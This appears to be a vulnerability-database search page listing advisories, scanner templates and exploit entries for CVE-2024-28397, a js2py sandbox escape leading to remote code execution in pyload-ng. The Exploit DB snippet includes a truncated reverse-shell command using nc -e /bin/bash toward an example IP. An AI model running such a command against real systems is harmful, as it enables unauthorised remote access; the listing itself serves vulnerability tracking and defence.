Lucene search
+L

53 matches found

Nuclei
Nuclei
added yesterday194 views

pyload-ng js2py - Remote Code Execution

An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. id: CVE-2024-28397 info: name: pyload-ng js2py - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: medium description: | An issue in the...

5.3CVSS7.4AI score0.04548EPSS
Exploits22References2
OSV
OSV
added 2026/06/29 11:50 a.m.5 views

PYSEC-2026-499 pyload-ng vulnerable to RCE with js2py sandbox escape

Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...

9.8CVSS6.8AI score0.16513EPSS
Exploits22References7
GithubExploit
GithubExploit
added 2026/05/12 5:47 p.m.83 views

Exploit for CVE-2024-28397

CVE-2024-28397 - Js2Py Sandbox Escape Payload Generator This...

5.3CVSS5.8AI score0.04548EPSS
Exploits22
Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.88 views

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

5.3CVSS6.6AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2026/02/03 8:44 a.m.173 views

Exploit for CVE-2024-28397

CVE-2024-28397: Js2Py Sandbox Escape Payload Generator !Pyth...

5.3CVSS6.1AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2026/01/11 1:14 p.m.292 views

Exploit for CVE-2024-28397

js2py Sandbox Escape CVE-2024-28397 Exploit para ejecución...

5.3CVSS6.8AI score0.04548EPSS
Exploits22
Packet Storm
Packet Storm
added 2025/12/18 12:0 a.m.179 views

📄 js2py 0.74 Automated Sandbox Escape / Code Execution

js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell. ============================================================================================================================================= | Title : js2py v0.74 Automated Sandbox Escape & Revers...

5.3CVSS8.3AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/12/06 4:48 p.m.266 views

Exploit for CVE-2024-28397

CVE-2024-28397 Exploit Automation A Python automation script...

5.3CVSS7.3AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/09/17 4:56 a.m.242 views

Exploit for CVE-2024-28397

CVE-2024-28397-Js2Py-RCE This reposi...

5.3CVSS7.8AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/09/15 3:16 p.m.415 views

Exploit for CVE-2024-28397

CVE-2024-28397 js2py Sandbox Escape Exploit A collection of e...

5.3CVSS9.1AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/09/09 9:57 a.m.197 views

Exploit for CVE-2024-28397

CVE-2024-28397 js2py Sandbox Escape Exploit - CodePartTwo - H...

5.3CVSS6.1AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/09/06 11:39 a.m.262 views

Exploit for CVE-2024-28397

🚨 Remote Code Execution – CVE-2024-28397 pyload-ng / js2py...

5.3CVSS7.6AI score0.04548EPSS
Exploits22
Tenable Nessus
Tenable Nessus
added 2025/09/02 12:0 a.m.4 views

Linux Distros Unpatched Vulnerability : CVE-2024-28397

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. CVE-2024-28397 Note that...

5.3CVSS6.8AI score0.04548EPSS
Exploits22References2
GithubExploit
GithubExploit
added 2025/08/28 7:39 a.m.1158 views

Exploit for CVE-2024-28397

CVE-2024-28397-js2py-Sandbox-Escape js2py Vulnerability Ana...

5.3CVSS7.7AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/08/27 11:39 a.m.325 views

Exploit for CVE-2024-28397

CodeTwoRCEExploit This script incorporates authentication to a...

5.3CVSS8.8AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/08/18 3:40 p.m.624 views

Exploit for CVE-2024-28397

CVE-2024-28397 RCE Script Default reverse shell payload and o...

5.3CVSS6.6AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/08/18 1:9 a.m.443 views

Exploit for CVE-2024-28397

CVE-2024-28397 - js2py Sandbox Escape Description The CV...

5.3CVSS7.2AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/08/17 4:0 a.m.950 views

Exploit for CVE-2024-28397

CVE-2024-28397-command-execution-poc This vulnerability arises...

5.3CVSS7.2AI score0.04548EPSS
Exploits22
Packet Storm
Packet Storm
added 2025/02/28 12:0 a.m.640 views

js2py 0.74 Code Execution

js2py version 0.74 suffers from a code execution vulnerability. ============================================================================================================================================= | Title : js2py versions 0.74 Code Injection Vulnerability | | Author : indoushka | | Teste...

7.9AI score
Exploits0
0day.today
0day.today
added 2024/11/18 12:0 a.m.810 views

Pyload Remote Code Execution Exploit

CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...

9.8CVSS6.8AI score0.16513EPSS
Exploits22
Rows per page
Query Builder